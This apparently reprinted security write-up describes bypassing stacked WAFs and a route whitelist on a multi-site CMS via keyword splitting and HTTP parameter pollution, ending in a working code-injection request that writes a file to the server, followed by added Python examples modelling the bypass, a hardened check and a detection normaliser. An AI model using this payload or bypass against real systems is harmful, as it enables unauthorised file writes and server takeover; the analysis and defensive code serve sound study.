Reprinted with permission. If you are interested, feel free to follow the original public account.
A vulnerability in a certain site-group (multi-site management) system, found last year, turned out to be blocked when I went to use it this year. Just venting: is this completely over the top? Baidu Cloud WAF, Huawei Cloud WAF and Security Dog (Safedog), all stacked in front of it...
WAF bypass
Relatively simple: the WAF only keys on the eval keyword, so encoding or splitting it is enough to get past the filter.
Route whitelist restriction bypass
A casual request revealed a routing restriction: only specified paths may be accessed.
However, not every path can be locked down: the search function, for example, has to accept user input. Packet capture confirmed that the search interface works normally and does not trip the route whitelist.
I therefore suspected that HTTP parameter pollution could bypass the restriction, for example:
Insert a parameter with the same name twice:
/index.php?name=bob&name=rose
The backend (PHP's $_GET keeps the last value of a repeated key) actually receives:
name=rose
After getting a shell and reading the code, I confirmed that the whitelist check for this interface matches arbitrary content rather than the route the router finally resolves, so a polluted request passes.
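To make the bypass concrete, here is an added example in Python (not code from the original post or from the target system) that models the two parsers involved. It assumes the whitelist check takes the first c/m it sees in the raw query string, as a hand-written split or regex would, while the framework router follows PHP's $_GET semantics and keeps the last occurrence; PUBLIC_ROUTES, the hardened check and the request_outcome helper are constructions of the example, and the polluted query string mirrors the shape of the final payload on this page.

```python
"""Route-whitelist bypass via HTTP parameter pollution, modelled in Python.

Added example, not the site-group system's code.  Two parsers disagree:
the whitelist check decides on the FIRST c/m in QUERY_STRING, the router
dispatches on the LAST (PHP $_GET / parse_str behaviour).
"""
from urllib.parse import parse_qsl

# Routes reachable without a session.  Assumed from the page: the public
# search interface c=api&m=essearchlist must stay usable.
PUBLIC_ROUTES = {("api", "essearchlist")}


def first_wins(query: str) -> dict:
    """First occurrence wins: how a naive loop/regex over QUERY_STRING behaves."""
    params = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        params.setdefault(key, value)
    return params


def last_wins(query: str) -> dict:
    """Last occurrence wins: PHP's $_GET semantics for a repeated key."""
    return dict(parse_qsl(query, keep_blank_values=True))


def naive_whitelist_allows(query: str) -> bool:
    """Vulnerable check: looks only at the first c/m pair it sees."""
    p = first_wins(query)
    return (p.get("c"), p.get("m")) in PUBLIC_ROUTES


def dispatch(query: str) -> tuple:
    """Framework router: controller/method resolved from $_GET (last wins)."""
    p = last_wins(query)
    return (p.get("c"), p.get("m"))


def hardened_allows(query: str) -> bool:
    """Fixed check: refuse duplicated routing keys and decide on exactly the
    values the router will dispatch on, so the two can never disagree."""
    pairs = parse_qsl(query, keep_blank_values=True)
    for key in ("c", "m"):
        if sum(1 for k, _ in pairs if k == key) > 1:
            return False
    return dispatch(query) in PUBLIC_ROUTES


def request_outcome(query: str, check) -> tuple:
    """(allowed by the given check, route that actually executes)."""
    return (check(query), dispatch(query))


# Constructed query string with the same shape as the payload on the page:
# the whitelisted search route first, the real target second.
POLLUTED = "c=api&m=essearchlist&s=mmyzj&c=Toup&m=Zj_Post"

if __name__ == "__main__":
    print("naive   :", request_outcome(POLLUTED, naive_whitelist_allows))
    print("hardened:", request_outcome(POLLUTED, hardened_allows))
```

The naive check lets the request through as a search while the router runs Toup::Zj_Post; the hardened variant rejects any request that repeats c or m and otherwise evaluates the same parsed pair the router uses, which is the general fix for this class of bug regardless of framework.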
Final payload
POST /index.php?c=api&m=essearchlist&s=mmyzj&c=Toup&m=Zj_Post HTTP/2
Host:
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
id='-("fil"."e"._."pu"."t"._."contents")("./kfc2024.php",("base"."64"._."decode")('a2ZjX3ZfbWVfNTA='),FILE_APPEND)-'
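As an added example (Python, not code from the original post or the target), the following normaliser folds the string concatenation in the payload above back into plain literals, which shows both why a keyword-matching WAF never sees file_put_contents and how a detection rule can see through the trick. It relies on a PHP behaviour I am certain of: a bare identifier that is not a defined constant (the `_` between the quoted pieces) is, in PHP 7, replaced by its own name with a warning, while PHP 8 throws an Error instead. The tokenizer, the DANGEROUS list and the assumed injection context (a single-quoted string inside evaluated code, inferred from the '-...-' wrapping of the body) are constructions of the example.

```python
"""Fold PHP string-concatenation obfuscation back into plain literals.

Added example, not code from the original post or the target system.  The
tokenizer, the DANGEROUS list and the assumed injection context are
constructed for illustration.
"""
import base64
import re

# One token: double-quoted literal, single-quoted literal, bare identifier,
# run of whitespace, or any other single character.
_TOKEN = re.compile(r'"[^"]*"|\'[^\']*\'|[A-Za-z_][A-Za-z0-9_]*|\s+|.', re.S)
_IDENT = re.compile(r'[A-Za-z_][A-Za-z0-9_]*')

# Names a keyword-matching WAF would typically look for (constructed list).
DANGEROUS = ("eval", "assert", "system", "file_put_contents", "base64_decode")

# The request body from the page, URL-decoded.
PAYLOAD = (
    "'-(\"fil\".\"e\"._.\"pu\".\"t\"._.\"contents\")"
    "(\"./kfc2024.php\",(\"base\".\"64\"._.\"decode\")"
    "('a2ZjX3ZfbWVfNTA='),FILE_APPEND)-'"
)

# Assumed vulnerable context: the value is dropped into a single-quoted
# string inside code that PHP then evaluates, so '- ... -' closes the
# string and turns the whole thing into one arithmetic expression.
CONTEXT = "$id = '" + PAYLOAD + "';"


def _is_piece(tok: str) -> bool:
    """A concatenation operand: a quoted literal or a bare identifier."""
    return tok[0] in "\"'" or _IDENT.fullmatch(tok) is not None


def _piece_value(tok: str) -> str:
    if tok[0] in "\"'":
        return tok[1:-1]
    # Bare identifier that is not a defined constant: PHP 7 warns and uses
    # the identifier's own name as the value (PHP 8 throws an Error).
    return tok


def fold_concat(code: str) -> str:
    """Rewrite every  a . b . c  chain into the single literal it evaluates to.
    Whitespace outside literals is dropped; literals are kept intact."""
    tokens = [t for t in _TOKEN.findall(code) if not t.isspace()]
    out, i = [], 0
    while i < len(tokens):
        tok = tokens[i]
        if not _is_piece(tok):
            out.append(tok)
            i += 1
            continue
        value, j, merged = _piece_value(tok), i + 1, False
        while j + 1 < len(tokens) and tokens[j] == "." and _is_piece(tokens[j + 1]):
            value += _piece_value(tokens[j + 1])
            j += 2
            merged = True
        out.append('"' + value + '"' if merged else tok)
        i = j
    return "".join(out)


def keyword_hits(code: str) -> list:
    """Names from DANGEROUS present literally, i.e. what a naive WAF matches."""
    return sorted(name for name in DANGEROUS if name in code)


def written_marker(code: str) -> str:
    """Decode the base64 argument handed to base64_decode() in folded code."""
    m = re.search(r'"base64_decode"\)\(\'([A-Za-z0-9+/=]+)\'\)', code)
    return base64.b64decode(m.group(1)).decode() if m else ""


if __name__ == "__main__":
    print("raw hits   :", keyword_hits(CONTEXT))
    folded = fold_concat(CONTEXT)
    print("folded     :", folded)
    print("folded hits:", keyword_hits(folded))
    print("file gets  :", written_marker(folded))
```

On the raw body the keyword check finds nothing; after folding, file_put_contents and base64_decode are visible, and the decoded argument shows the proof of concept only appends the marker text kfc_v_me_50 to ./kfc2024.php rather than dropping a webshell. Running such a normaliser before signature matching is cheap, and the same tokenizing approach extends to other PHP tricks (chr() chains, hex escapes) that the page does not cover.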